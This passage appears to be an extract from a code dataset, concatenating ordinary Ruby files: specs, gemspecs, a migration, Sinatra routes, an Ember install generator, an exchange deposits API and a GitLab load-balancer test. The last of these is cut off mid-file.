| 23.793103 | 105 | 0.613768 |
6a9df0e5099f178a01249027128709606c99697f | 2,246 | # frozen_string_literal: true
require 'spec_helper'
describe Bitbucket::Representation::PullRequest do
describe '#iid' do
it { expect(described_class.new('id' => 1).iid).to eq(1) }
end
describe '#author' do
it { expect(described_class.new({ 'author' => { 'nickname' => 'Ben' } }).author).to eq('Ben') }
it { expect(described_class.new({}).author).to be_nil }
end
describe '#description' do
it { expect(described_class.new({ 'description' => 'Text' }).description).to eq('Text') }
it { expect(described_class.new({}).description).to be_nil }
end
describe '#state' do
it { expect(described_class.new({ 'state' => 'MERGED' }).state).to eq('merged') }
it { expect(described_class.new({ 'state' => 'DECLINED' }).state).to eq('closed') }
it { expect(described_class.new({ 'state' => 'SUPERSEDED' }).state).to eq('closed') }
it { expect(described_class.new({}).state).to eq('opened') }
end
describe '#title' do
it { expect(described_class.new('title' => 'Issue').title).to eq('Issue') }
end
describe '#source_branch_name' do
it { expect(described_class.new({ source: { branch: { name: 'feature' } } }.with_indifferent_access).source_branch_name).to eq('feature') }
it { expect(described_class.new({ source: {} }.with_indifferent_access).source_branch_name).to be_nil }
end
describe '#source_branch_sha' do
it { expect(described_class.new({ source: { commit: { hash: 'abcd123' } } }.with_indifferent_access).source_branch_sha).to eq('abcd123') }
it { expect(described_class.new({ source: {} }.with_indifferent_access).source_branch_sha).to be_nil }
end
describe '#target_branch_name' do
it { expect(described_class.new({ destination: { branch: { name: 'master' } } }.with_indifferent_access).target_branch_name).to eq('master') }
it { expect(described_class.new({ destination: {} }.with_indifferent_access).target_branch_name).to be_nil }
end
describe '#target_branch_sha' do
it { expect(described_class.new({ destination: { commit: { hash: 'abcd123' } } }.with_indifferent_access).target_branch_sha).to eq('abcd123') }
it { expect(described_class.new({ destination: {} }.with_indifferent_access).target_branch_sha).to be_nil }
end
end
| 44.039216 | 147 | 0.685663 |
ff9ee2907c6312aac30e15438272aa5235fdb093 | 1,524 | # -*- encoding: utf-8 -*-
# stub: jekyll-sass-converter 1.5.2 ruby lib
Gem::Specification.new do |s|
s.name = "jekyll-sass-converter".freeze
s.version = "1.5.2"
s.required_rubygems_version = Gem::Requirement.new(">= 0".freeze) if s.respond_to? :required_rubygems_version=
s.require_paths = ["lib".freeze]
s.authors = ["Parker Moore".freeze]
s.date = "2018-02-03"
s.email = ["[email protected]".freeze]
s.homepage = "https://github.com/jekyll/jekyll-sass-converter".freeze
s.licenses = ["MIT".freeze]
s.rubygems_version = "3.2.3".freeze
s.summary = "A basic Sass converter for Jekyll.".freeze
s.installed_by_version = "3.2.3" if s.respond_to? :installed_by_version
if s.respond_to? :specification_version then
s.specification_version = 4
end
if s.respond_to? :add_runtime_dependency then
s.add_runtime_dependency(%q<sass>.freeze, ["~> 3.4"])
s.add_development_dependency(%q<bundler>.freeze, ["~> 1.5"])
s.add_development_dependency(%q<jekyll>.freeze, [">= 2.0"])
s.add_development_dependency(%q<rake>.freeze, [">= 0"])
s.add_development_dependency(%q<rspec>.freeze, [">= 0"])
s.add_development_dependency(%q<rubocop>.freeze, ["= 0.51"])
else
s.add_dependency(%q<sass>.freeze, ["~> 3.4"])
s.add_dependency(%q<bundler>.freeze, ["~> 1.5"])
s.add_dependency(%q<jekyll>.freeze, [">= 2.0"])
s.add_dependency(%q<rake>.freeze, [">= 0"])
s.add_dependency(%q<rspec>.freeze, [">= 0"])
s.add_dependency(%q<rubocop>.freeze, ["= 0.51"])
end
end
| 38.1 | 112 | 0.667323 |
877f0787e1a21d506921e2f8bda91f2b8813298f | 228 | class AddAnnouncementManagerCourseRelationships < ActiveRecord::Migration[6.1]
def change
add_reference :courses, :announcement_manager, index: true
add_reference :announcement_managers, :course, index: true
end
end
| 32.571429 | 78 | 0.798246 |
ab6cf319900ebae992c4f956338751531fe60eb2 | 922 | # coding: utf-8
lib = File.expand_path('../lib', __FILE__)
$LOAD_PATH.unshift(lib) unless $LOAD_PATH.include?(lib)
require 'json_structure/version'
Gem::Specification.new do |spec|
spec.name = "json_structure"
spec.version = JsonStructure::VERSION
spec.authors = ["Kaido Iwamoto"]
spec.email = ["[email protected]"]
if spec.respond_to?(:metadata)
end
spec.summary = %q{JSON structure checker}
spec.description = %q{}
spec.homepage = "http://github.com/odiak/json_structure"
spec.license = "MIT"
spec.files = `git ls-files -z`.split("\x0").reject { |f| f.match(%r{^(test|spec|features)/}) }
spec.bindir = "exe"
spec.executables = spec.files.grep(%r{^exe/}) { |f| File.basename(f) }
spec.require_paths = ["lib"]
spec.add_development_dependency "bundler", "~> 1.8"
spec.add_development_dependency "rake", "~> 10.0"
end
| 32.928571 | 104 | 0.636659 |
ac9f57487862082bb0451a597e76a7e6abf368fc | 344 | module SHD
class EnvironmentChecker
def self.check!
return if !ENV["GITHUB_TOKEN"].nil? && !ENV["GITHUB_TOKEN"].empty?
REQUIRED_ENV.each do |key|
if ENV[key].nil? || ENV[key].empty?
Logger.fatal "`#{key}` is missing from the environment, exiting"
exit(-1)
end
end
end
end
end
| 21.5 | 74 | 0.584302 |
791bd383c8b4db7f9f5bf18385b8fb4d7e366167 | 400 | require 'spec_helper'
describe "Comparisons" do
describe "create a new comparison" do
it "should show a flash message on success" do
=begin
visit msruns_path
click_button("Add To Comparison Set One")
click_button("Add To Comparison Set Two")
click_button("Compare")
page.should have_content("started")
response.status.should be(200)
=end
end
end
end
| 23.529412 | 50 | 0.6925 |
7944802f29a4719c1533376cfe62d1323c2e3d4f | 7,371 | require 'whimsy/asf/memapps'
class Committer
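  # Builds the hash that is rendered as JSON for a single committer's roster page.
  # `env` carries the authenticated requester: member-only and secretary/root-only
  # fields (ICLA/membership forms, list subscriptions) are included based on it.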
def self.serialize(id, env)
response = {}
person = ASF::Person.find(id)
person.reload!
return unless person.attrs['cn']
response[:id] = id
response[:member] = person.asf_member?
# reformat the timestamp
m = person.createTimestamp.match(/^(\d\d\d\d)(\d\d)(\d\d)/)
if m
response[:createTimestamp] = m[1] + '-' + m[2] + '-' + m[3]
else # should not happen, but ...
response[:createTimestamp] = person.createTimestamp
end
name = {}
if person.icla
name[:public_name] = person.public_name
if id == env.user or ASF::Person.find(env.user).asf_member?
name[:legal_name] = person.icla.legal_name
end
end
unless person.attrs['cn'].empty?
name[:ldap] = person.attrs['cn'].first.force_encoding('utf-8')
end
unless (person.attrs['givenName'] || []).empty?
name[:given_name] = person.attrs['givenName'].first.force_encoding('utf-8')
end
unless person.attrs['sn'].empty?
name[:family_name] = person.attrs['sn'].first.force_encoding('utf-8')
end
response[:name] = name
response[:email_forward] = person.mail # forwarding
response[:email_alt] = person.alt_email # alternates
response[:email_other] = person.all_mail - person.mail - person.alt_email # others (ASF mail/ICLA mail if different)
unless person.pgp_key_fingerprints.empty?
response[:pgp] = person.pgp_key_fingerprints
end
unless person.ssh_public_keys.empty?
response[:ssh] = person.ssh_public_keys
end
response[:host] = person.attrs['host'] || ['(none)']
response[:inactive] = person.inactive?
if person.attrs['asf-sascore']
response[:sascore] = person.attrs['asf-sascore'].first # should only be one, but is returned as array
end
if person.attrs['githubUsername']
response[:githubUsername] = person.attrs['githubUsername'] # always return array
end
response[:urls] = person.urls unless person.urls.empty?
response[:committees] = person.committees.map(&:name)
response[:groups] = person.services
response[:committer] = []
response[:podlings] = []
pmcs = ASF::Committee.pmcs
pmc_names = pmcs.map(&:name) # From CI
podlings = ASF::Podling.current.map(&:id)
# Add group names unless they are a PMC group
person.groups.map(&:name).each do |group|
unless pmc_names.include? group
response[:groups] << group
end
end
# Get project(member) details
person.projects.map(&:name).each do |project|
if pmc_names.include? project
# Don't show committer karma if person has committee karma
unless response[:committees].include? project
# LDAP project group
response[:committer] << project
end
elsif podlings.include? project
response[:podlings] << project
else
# TODO should this populate anything?
end
end
ASF::Authorization.new('asf').each do |group, members|
response[:groups] << group if members.include? id
end
ASF::Authorization.new('pit').each do |group, members|
response[:groups] << group if members.include? id
end
response[:committees].sort!
response[:groups].sort!
response[:committer].sort!
response[:podlings].sort!
member = {} # collect member info
inMembersTxt = ASF::Member.find(id) # i.e. present in members.txt
if inMembersTxt
# This is public
member[:status] = ASF::Member.status[id] || 'Active'
end
response[:forms] = {}
if ASF::Person.find(env.user).asf_member? # i.e. member karma
if person.icla and person.icla.claRef # Not all people have iclas
claRef = person.icla.claRef.untaint
file = ASF::ICLAFiles.match_claRef(claRef)
if file
          url = ASF::SVN.svnurl('iclas')
response[:forms][:icla] = "#{url}/#{file}"
end
end
if inMembersTxt
member[:info] = person.members_txt
if person.icla # not all members have iclas
file = ASF::MemApps.find1st(person)
if file
url = ASF::SVN.svnurl('member_apps')
response[:forms][:member] = "#{url}/#{file}"
end
end
file = ASF::EmeritusFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus')
response[:forms][:emeritus] = "#{url}/#{file}"
end
file = ASF::EmeritusRequestFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-requests-received')
response[:forms][:emeritus_request] = "#{url}/#{file}"
end
file = ASF::EmeritusRescindedFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-requests-rescinded')
response[:forms][:emeritus_rescinded] = "#{url}/#{file}"
end
file = ASF::EmeritusReinstatedFiles.find(person)
if file
url = ASF::SVN.svnurl('emeritus-reinstated')
response[:forms][:emeritus_reinstated] = "#{url}/#{file}"
end
else
if person.member_nomination
member[:nomination] = person.member_nomination
end
end
else # not an ASF member; no karma for ICLA docs so don't add link
response[:forms][:icla] = '' if person.icla and person.icla.claRef
end
response[:member] = member unless member.empty?
if ASF::Person.find(env.user).asf_member? or env.user == id
response[:moderates] = {}
require 'whimsy/asf/mlist'
ASF::MLIST.moderates(person.all_mail, response)
end
auth = Auth.info(env)
if env.user == id or auth[:root] or auth[:secretary]
require 'whimsy/asf/mlist'
ASF::MLIST.subscriptions(person.all_mail, response) # updates response[:subscriptions]
# (Does not update the response if the digest info is not available)
ASF::MLIST.digests(person.all_mail, response)
# Check for missing private@ subscriptions
response[:privateNosub] = []
end
# chair info is public, so let everyone see it
response[:chairOf] = []
response[:committees].each do |cttee|
pmc = ASF::Committee.find(cttee)
chairs = pmc.chairs.map {|x| x[:id]}
response[:chairOf] << cttee if chairs.include?(id)
# mailing list info is not public ...
if response[:subscriptions] # did we get access to the mail?
pmail = "private@#{pmc.mail_list}.apache.org" rescue ''
subbed = false
response[:subscriptions].each do |sub|
if sub[0] == pmail
subbed = true
end
end
response[:privateNosub] << cttee unless subbed
end
end
response[:pmcs] = []
response[:nonpmcs] = []
pmcs.each do |pmc|
response[:pmcs] << pmc.name if pmc.roster.include?(person.id)
response[:chairOf] << pmc.name if pmc.chairs.map{|ch| ch[:id]}.include?(person.id)
end
response[:pmcs].sort!
response[:nonPMCchairOf] = [] # use separate list to avoid missing pmc-chair warnings
nonpmcs = ASF::Committee.nonpmcs
nonpmcs.each do |nonpmc|
response[:nonpmcs] << nonpmc.name if nonpmc.roster.include?(person.id)
response[:nonPMCchairOf] << nonpmc.name if nonpmc.chairs.map{|ch| ch[:id]}.include?(person.id)
end
response[:nonpmcs].sort!
response
end
end
| 30.458678 | 120 | 0.622711 |
d57cc1470cd2069d9f079af9f1a0493ff1cd4d44 | 6,494 | require 'generators/ember/generator_helpers'
require 'net/http'
require 'uri'
require 'fileutils'
module Ember
module Generators
class InstallGenerator < ::Rails::Generators::Base
class InvalidChannel < ::Thor::Error; end
class ConflictingOptions < ::Thor::Error; end
class InsufficientOptions < ::Thor::Error; end
::InvalidChannel = InvalidChannel
::ConflictingOptions = ConflictingOptions
::InsufficientOptions = InsufficientOptions
desc "Install Ember.js into your vendor folder"
class_option :head,
:type => :boolean,
:default => false,
:desc => "Download Ember.js & Ember data from canary channel. This is deprecated. Use channel instead."
class_option :channel,
:type => :string,
:required => false,
:desc => "Ember release channel Choose between 'release', 'beta' or 'canary'"
class_option :ember_only,
:type => :boolean,
:required => false,
:desc => "Only download Ember.",
:aliases => '--ember'
class_option :ember_data_only,
:type => :boolean,
:required => false,
:desc => "Only download ember-data",
:aliases => '--ember-data'
class_option :tag,
:type => :string,
:required => false,
:desc => "Download tagged release use syntax v1.0.0-beta.3/ember-data & v1.0.0-rc.8/ember"
def initialize(args = [], options = {}, config = {})
super(args, options, config)
check_options
process_options
end
def ember
begin
unless options.ember_data_only?
get_ember_js_for(:development)
get_ember_js_for(:production)
end
rescue Thor::Error
say('WARNING: no ember files on this channel or tag' , :yellow)
end
end
def ember_data
begin
unless options.ember_only?
get_ember_data_for(:development)
get_ember_data_for(:production)
end
rescue Thor::Error
say('WARNING: no ember-data files on this channel or tag' , :yellow)
end
end
private
def get_ember_data_for(environment)
# temporarily using a variable here until a stable release of
# ember-data is released so that installing with ember-data
# *just works*.
chan = if channel.to_s == 'release'
say_status("warning:", 'Ember Data is not available on the :release channel. Falling back to beta channel.' , :yellow)
:beta
else
channel
end
create_file "vendor/assets/ember/#{environment}/ember-data.js" do
fetch url_for(chan, 'ember-data', environment), "vendor/assets/ember/#{environment}/ember-data.js"
end
sourcemap_url = "#{base_url}/#{chan}/ember-data.js.map"
if resource_exist?(sourcemap_url)
create_file "vendor/assets/ember/#{environment}/ember-data.js.map" do
fetch sourcemap_url, "vendor/assets/ember/#{environment}/ember-data.js.map", false
end
end
end
def get_ember_js_for(environment)
create_file "vendor/assets/ember/#{environment}/ember.js" do
fetch url_for(channel, 'ember', environment), "vendor/assets/ember/#{environment}/ember.js"
end
end
def url_for(channel, component, environment)
base = "#{base_url}/#{channel}/#{component}"
case environment
when :production
"#{base}.min.js"
when :development
if resource_exist?("#{base}.debug.js")
"#{base}.debug.js" # Ember.js 1.10.0.beta.1 or later
else
"#{base}.js"
end
end
end
def check_options
if options.head?
say('WARNING: --head option is deprecated in favor of --channel=canary' , :yellow)
end
if options.head? && options.channel?
say 'ERROR: conflicting options. --head and --channel. Use either --head or --channel=<channel>', :red
raise ConflictingOptions
end
if options.channel? && !%w(release beta canary).include?(options[:channel])
say 'ERROR: channel can either be release, beta or canary', :red
raise InvalidChannel
end
if options.channel? && options.tag?
say 'ERROR: conflicting options. --tag and --channel. --tag is incompatible with other options', :red
raise ConflictingOptions
end
if options.head? && options.tag?
say 'ERROR: conflicting options. --tag and --head. --tag is incompatible with other options', :red
raise ConflictingOptions
end
if options.tag? && !(options.ember_only? || options.ember_data_only?)
          say 'ERROR: insufficient options. --tag needs to be combined with either --ember or --ember-data', :red
raise InsufficientOptions
end
end
def process_options
if options.head?
@channel = :canary
end
if options.tag?
@channel = "tags/#{options.tag}"
end
end
def base_url
'http://builds.emberjs.com'
end
def channel
if options.channel
@channel ||= options[:channel]
else
@channel ||= :release
end
end
def fetch(from, to, prepend_verbose = true)
message = "#{from} -> #{to}"
say_status("downloading:", message , :green)
uri = URI(from)
output = StringIO.new
if prepend_verbose
output.puts "// Fetched from channel: #{channel}, with url " + uri.to_s
output.puts "// Fetched on: " + Time.now.utc.iso8601.to_s
end
response = Net::HTTP.get_response(uri)
case response.code
when '404'
say "ERROR: Error reading the content from the channel with url #{from}. File not found" , :red
raise Thor::Error
when '200'
output.puts response.body.force_encoding("UTF-8")
else
say "ERROR: Unexpected error with status #{response.code} reading the content from the channel with url #{from}." , :red
raise Thor::Error
end
output.rewind
content = output.read
end
def resource_exist?(target)
uri = URI(target)
response = Net::HTTP.new(uri.host, uri.port).head(uri.path)
response.code == '200'
end
end
end
end
| 32.633166 | 130 | 0.590391 |
916371613778b9559b6c5fb50f60007dce76e0fe | 933 | # frozen_string_literal: true
module Gitlab
module ImportExport
module Group
class RelationFactory < Base::RelationFactory
OVERRIDES = {
labels: :group_labels,
priorities: :label_priorities,
label: :group_label,
parent: :epic
}.freeze
EXISTING_OBJECT_RELATIONS = %i[
epic
epics
milestone
milestones
label
labels
group_label
group_labels
].freeze
private
def setup_models
setup_note if @relation_name == :notes
update_group_references
end
def update_group_references
return unless self.class.existing_object_relations.include?(@relation_name)
return unless @relation_hash['group_id']
@relation_hash['group_id'] = @importable.id
end
end
end
end
end
| 21.697674 | 85 | 0.573419 |
181a8424ec9e5f2b3609c145f9d4adda2ad2e44e | 530 | require 'yaml'
require 'hashr'
require 'travis/config/helpers'
module Travis
class Config < Hashr
class Files
include Helpers
def load
filenames.inject({}) do |config, filename|
deep_merge(config, load_file(filename)[Config.env] || {})
end
end
private
def load_file(filename)
YAML.load_file(filename) || {} rescue {}
end
def filenames
@filenames ||= Dir['config/{travis.yml,travis/*.yml}'].sort
end
end
end
end
| 18.928571 | 69 | 0.581132 |
62704946a07aa0ab0cf162acfd696be58a0d429b | 122 | class AddTimestampsToPrayers < ActiveRecord::Migration[5.1]
def change
add_timestamps :prayers, null: true
end
end
| 20.333333 | 59 | 0.770492 |
0382fd5a9310e033a08f7bf0ededcdba3bbe99b2 | 4,570 | ##
# Generated by "rake sinatra:from_rails:classic OUTPUT_FILE=/Users/nwiger/Workspace/sinatra_from_rails/spec/output/main_xml.rb FORMAT=xml RENDER=builder"
# Keep up to date: http://github.com/nateware/sinatra_from_rails
#
# Categories
get '/categories.xml' do
@categories = Category.all
@categories.to_xml
end
get '/categories/:id.xml' do
@category = Category.find(params[:id])
@category.to_xml
end
post '/categories/:id/details.xml' do
@category = Category.view(params[:policy_type], params[:platform],
session[:region_code] || Setting[:default_region],
session[:language_code] || Setting[:default_language],
params[:username])
builder :'categories/view'
end
get '/categories/new.xml' do
@category = Category.new
@category.to_xml
end
post '/categories.xml' do
@category = Category.new(params[:category])
if @category.save
@category.to_xml
else
@category.errors.to_xml
end
end
put '/categories/:id.xml' do
@category = Category.find(params[:id])
raise InvalidCategory if [params[:a], params[:b]].include? '123'
if @category.update_attributes(params[:category])
halt 200
else
@category.errors.to_xml
end
end
delete '/categories/:id.xml' do
@category = Category.find(params[:id])
@category.destroy
halt 200
end
# Complexes
get '/complexes.xml' do
@complexes = Complex.all
@complexes.to_xml
end
get '/complexes/:id.xml' do
if params[:username]
@complex = Complex.find_by_username(params[:username])
else
@complex = Complex.find(params[:id])
end
@complex.to_xml
end
get '/complexes/new.xml' do
@complex = Complex.new
@complex.to_xml
end
post '/complexes.xml' do
@complex = Complex.new(params[:complex])
if @complex.save
@complex.to_xml
else
@complex.errors.to_xml
end
end
put '/complexes/:id.xml' do
@complex = Complex.find(params[:id])
if @complex.update_attributes(params[:complex])
halt 200
else
@complex.errors.to_xml
end
end
get '/complexes/search.xml' do
@complex =
if ! params[:search].nil?
Complex.search(params)
elsif ! params[:search_tags].nil?
Complex.tags_search(params)
end
raise "Insufficient input to search with - please provide a value for either the 'search' or 'search_tags' request parameters." if params[:search].nil? && params[:search_tags].nil?
builder :'complexes/search'
end
delete '/complexes/:id.xml' do
@complex = Complex.find(params[:id])
@complex.destroy
halt 200
end
# Posts
get '/posts.xml' do
@posts = Post.all
@posts.to_xml
end
get '/posts/:id.xml' do
@post = Post.find(params[:id])
@post.to_xml
end
get '/posts/new.xml' do
@post = Post.new
@post.to_xml
end
post '/posts.xml' do
@post = Post.new(params[:post])
if @post.save
@post.to_xml
else
@post.errors.to_xml
end
end
put '/posts/:id.xml' do
@post = Post.find(params[:id])
if @post.update_attributes(params[:post])
halt 200
else
@post.errors.to_xml
end
end
delete '/posts/:id.xml' do
@post = Post.find(params[:id])
@post.destroy
halt 200
end
# Topic categories
get '/topic_categories.xml' do
@topic_categories = TopicCategory.all
@topic_categories.to_xml
end
get '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
@topic_category.to_xml
end
get '/topic_categories/new.xml' do
@topic_category = TopicCategory.new
@topic_category.to_xml
end
post '/topic_categories.xml' do
@topic_category = TopicCategory.new(params[:topic_category])
if @topic_category.save
@topic_category.to_xml
else
@topic_category.errors.to_xml
end
end
put '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
if @topic_category.update_attributes(params[:topic_category])
halt 200
else
@topic_category.errors.to_xml
end
end
delete '/topic_categories/:id.xml' do
@topic_category = TopicCategory.find(params[:id])
@topic_category.destroy
halt 200
end
# Users
get '/users.xml' do
@users = User.all
@users.to_xml
end
get '/users/:id.xml' do
@user = User.find(params[:id])
@user.to_xml
end
get '/users/new.xml' do
@user = User.new
@user.to_xml
end
post '/users.xml' do
@user = User.new(params[:user])
if @user.save
@user.ticket = Ticket.generate
@user.to_xml
else
@user.errors.to_xml
end
end
put '/users/:id.xml' do
@user = User.find(params[:id])
if @user.update_attributes(params[:user])
halt 200
else
@user.errors.to_xml
end
end
delete '/users/:id.xml' do
@user = User.find(params[:id])
@user.destroy
halt 200
end
| 19.869565 | 182 | 0.698687 |
28d9d922ab1d064e92485be7cf7be9ce23f0c95b | 3,589 | # encoding: UTF-8
# frozen_string_literal: true
require_relative '../validations'
module API
module V2
module Account
class Deposits < Grape::API
before { deposits_must_be_permitted! }
desc 'Get your deposits history.',
is_array: true,
success: API::V2::Entities::Deposit
params do
optional :currency,
type: String,
values: { value: -> { Currency.enabled.codes(bothcase: true) }, message: 'account.currency.doesnt_exist' },
desc: 'Currency code'
optional :state,
type: String,
values: { value: -> { Deposit::STATES.map(&:to_s) }, message: 'account.deposit.invalid_state' }
optional :limit,
type: { value: Integer, message: 'account.deposit.non_integer_limit' },
values: { value: 1..100, message: 'account.deposit.invalid_limit' },
default: 100,
desc: "Number of deposits per page (defaults to 100, maximum is 100)."
optional :page,
type: { value: Integer, message: 'account.deposit.non_integer_page' },
values: { value: -> (p){ p.try(:positive?) }, message: 'account.deposit.non_positive_page'},
default: 1,
desc: 'Page number (defaults to 1).'
end
get "/deposits" do
currency = Currency.find(params[:currency]) if params[:currency].present?
current_user.deposits.order(id: :desc)
.tap { |q| q.where!(currency: currency) if currency }
.tap { |q| q.where!(aasm_state: params[:state]) if params[:state] }
.tap { |q| present paginate(q), with: API::V2::Entities::Deposit }
end
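        # Illustrative request (the mount prefix is an assumption; it depends on where
        # this Grape API is mounted):
        #
        #   GET /api/v2/account/deposits?currency=btc&limit=10&page=1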
desc 'Get details of specific deposit.' do
success API::V2::Entities::Deposit
end
params do
requires :txid,
type: String,
allow_blank: false,
desc: "Deposit transaction id"
end
get "/deposits/:txid" do
deposit = current_user.deposits.find_by!(txid: params[:txid])
present deposit, with: API::V2::Entities::Deposit
end
        desc 'Returns deposit address for the account you want to deposit to by currency. ' \
             'The address may be blank because the address generation process is still in progress. ' \
             'In this case you should try again later.',
success: API::V2::Entities::Deposit
params do
requires :currency,
type: String,
values: { value: -> { Currency.coins.enabled.codes(bothcase: true) }, message: 'account.currency.doesnt_exist'},
desc: 'The account you want to deposit to.'
given :currency do
optional :address_format,
type: String,
values: { value: -> { %w[legacy cash] }, message: 'account.deposit_address.invalid_address_format' },
validate_currency_address_format: { value: true, prefix: 'account.deposit_address' },
desc: 'Address format legacy/cash'
end
end
get '/deposit_address/:currency' do
current_user.ac(params[:currency]).payment_address.yield_self do |pa|
{ currency: params[:currency], address: params[:address_format] ? pa.format_address(params[:address_format]) : pa.address }
end
end
end
end
end
end
| 42.223529 | 135 | 0.555865 |
5d8440123e6231f5716c902b65d9663511693ec6 | 12,061 | # frozen_string_literal: true
require 'spec_helper'
RSpec.describe Gitlab::Database::LoadBalancing::LoadBalancer, :request_store do
let(:conflict_error) { Class.new(RuntimeError) }
let(:db_host) { ActiveRecord::Base.connection_pool.db_config.host }
let(:lb) { described_class.new([db_host, db_host]) }
let(:request_cache) { lb.send(:request_cache) }
before do
stub_const(
'Gitlab::Database::LoadBalancing::LoadBalancer::PG::TRSerializationFailure',
conflict_error
)
end
after do |example|
lb.disconnect!(timeout: 0) unless example.metadata[:skip_disconnect]
end
def raise_and_wrap(wrapper, original)
raise original
rescue original.class
raise wrapper, 'boop'
end
def wrapped_exception(wrapper, original)
raise_and_wrap(wrapper, original.new)
rescue wrapper => error
error
end
def twice_wrapped_exception(top, middle, original)
begin
raise_and_wrap(middle, original.new)
rescue middle => middle_error
raise_and_wrap(top, middle_error)
end
rescue top => top_error
top_error
end
describe '#initialize' do
it 'ignores the hosts when the primary_only option is enabled' do
lb = described_class.new([db_host], primary_only: true)
hosts = lb.host_list.hosts
expect(hosts.length).to eq(1)
expect(hosts.first)
.to be_instance_of(Gitlab::Database::LoadBalancing::PrimaryHost)
end
end
describe '#read' do
it 'yields a connection for a read' do
connection = double(:connection)
host = double(:host)
allow(lb).to receive(:host).and_return(host)
allow(host).to receive(:query_cache_enabled).and_return(true)
expect(host).to receive(:connection).and_return(connection)
expect { |b| lb.read(&b) }.to yield_with_args(connection)
end
it 'ensures that query cache is enabled' do
connection = double(:connection)
host = double(:host)
allow(lb).to receive(:host).and_return(host)
allow(host).to receive(:query_cache_enabled).and_return(false)
allow(host).to receive(:connection).and_return(connection)
expect(host).to receive(:enable_query_cache!).once
lb.read { 10 }
end
it 'marks hosts that are offline' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb.host_list.hosts[0]).to receive(:offline!)
expect(lb).to receive(:release_host)
raised = false
returned = lb.read do
unless raised
raised = true
raise
end
10
end
expect(returned).to eq(10)
end
it 'retries a query in the event of a serialization failure' do
raised = false
expect(lb).to receive(:release_host)
returned = lb.read do
unless raised
raised = true
raise conflict_error
end
10
end
expect(returned).to eq(10)
end
it 'retries every host at most 3 times when a query conflict is raised' do
expect(lb).to receive(:release_host).exactly(6).times
expect(lb).to receive(:read_write)
lb.read { raise conflict_error }
end
it 'uses the primary if no secondaries are available' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb.host_list.hosts).to all(receive(:online?).and_return(false))
expect(lb).to receive(:read_write).and_call_original
expect { |b| lb.read(&b) }
.to yield_with_args(ActiveRecord::Base.retrieve_connection)
end
it 'uses the primary when the primary_only option is enabled' do
lb = described_class.new(primary_only: true)
# When no hosts are configured, we don't want to produce any warnings, as
# they aren't useful/too noisy.
expect(Gitlab::Database::LoadBalancing::Logger).not_to receive(:warn)
expect { |b| lb.read(&b) }
.to yield_with_args(ActiveRecord::Base.retrieve_connection)
end
end
describe '#read_write' do
it 'yields a connection for a write' do
connection = ActiveRecord::Base.connection_pool.connection
expect { |b| lb.read_write(&b) }.to yield_with_args(connection)
end
it 'uses a retry with exponential backoffs' do
expect(lb).to receive(:retry_with_backoff).and_yield
lb.read_write { 10 }
end
end
describe '#host' do
it 'returns the secondary host to use' do
expect(lb.host).to be_an_instance_of(Gitlab::Database::LoadBalancing::Host)
end
it 'stores the host in a thread-local variable' do
request_cache.delete(described_class::CACHE_KEY)
expect(lb.host_list).to receive(:next).once.and_call_original
lb.host
lb.host
end
it 'does not create conflicts with other load balancers when caching hosts' do
lb1 = described_class.new([db_host, db_host], ActiveRecord::Base)
lb2 = described_class.new([db_host, db_host], Ci::CiDatabaseRecord)
host1 = lb1.host
host2 = lb2.host
expect(lb1.send(:request_cache)[described_class::CACHE_KEY]).to eq(host1)
expect(lb2.send(:request_cache)[described_class::CACHE_KEY]).to eq(host2)
end
end
describe '#release_host' do
it 'releases the host and its connection' do
host = lb.host
expect(host).to receive(:disable_query_cache!)
lb.release_host
expect(request_cache[described_class::CACHE_KEY]).to be_nil
end
end
describe '#release_primary_connection' do
it 'releases the connection to the primary' do
expect(ActiveRecord::Base.connection_pool).to receive(:release_connection)
lb.release_primary_connection
end
end
describe '#primary_write_location' do
it 'returns a String in the right format' do
expect(lb.primary_write_location).to match(%r{[A-F0-9]{1,8}/[A-F0-9]{1,8}})
end
it 'raises an error if the write location could not be retrieved' do
connection = double(:connection)
allow(lb).to receive(:read_write).and_yield(connection)
allow(connection).to receive(:select_all).and_return([])
expect { lb.primary_write_location }.to raise_error(RuntimeError)
end
end
describe '#retry_with_backoff' do
it 'returns the value returned by the block' do
value = lb.retry_with_backoff { 10 }
expect(value).to eq(10)
end
it 're-raises errors not related to database connections' do
expect(lb).not_to receive(:sleep) # to make sure we're not retrying
expect { lb.retry_with_backoff { raise 'boop' } }
.to raise_error(RuntimeError)
end
it 'retries the block when a connection error is raised' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb).to receive(:sleep).with(2)
expect(lb).to receive(:release_primary_connection)
raised = false
returned = lb.retry_with_backoff do
unless raised
raised = true
raise
end
10
end
expect(returned).to eq(10)
end
it 're-raises the connection error if the retries did not succeed' do
allow(lb).to receive(:connection_error?).and_return(true)
expect(lb).to receive(:sleep).with(2).ordered
expect(lb).to receive(:sleep).with(4).ordered
expect(lb).to receive(:sleep).with(16).ordered
expect(lb).to receive(:release_primary_connection).exactly(3).times
expect { lb.retry_with_backoff { raise } }.to raise_error(RuntimeError)
end
end
describe '#connection_error?' do
before do
stub_const('Gitlab::Database::LoadBalancing::LoadBalancer::CONNECTION_ERRORS',
[NotImplementedError])
end
it 'returns true for a connection error' do
error = NotImplementedError.new
expect(lb.connection_error?(error)).to eq(true)
end
it 'returns true for a wrapped connection error' do
wrapped = wrapped_exception(ActiveRecord::StatementInvalid, NotImplementedError)
expect(lb.connection_error?(wrapped)).to eq(true)
end
it 'returns true for a wrapped connection error from a view' do
wrapped = wrapped_exception(ActionView::Template::Error, NotImplementedError)
expect(lb.connection_error?(wrapped)).to eq(true)
end
it 'returns true for deeply wrapped/nested errors' do
top = twice_wrapped_exception(ActionView::Template::Error, ActiveRecord::StatementInvalid, NotImplementedError)
expect(lb.connection_error?(top)).to eq(true)
end
it 'returns true for an invalid encoding error' do
error = RuntimeError.new('invalid encoding name: unicode')
expect(lb.connection_error?(error)).to eq(true)
end
it 'returns false for errors not related to database connections' do
error = RuntimeError.new
expect(lb.connection_error?(error)).to eq(false)
end
it 'returns false for ActiveRecord errors without a cause' do
error = ActiveRecord::RecordNotUnique.new
expect(lb.connection_error?(error)).to eq(false)
end
end
describe '#serialization_failure?' do
let(:conflict_error) { Class.new(RuntimeError) }
before do
stub_const(
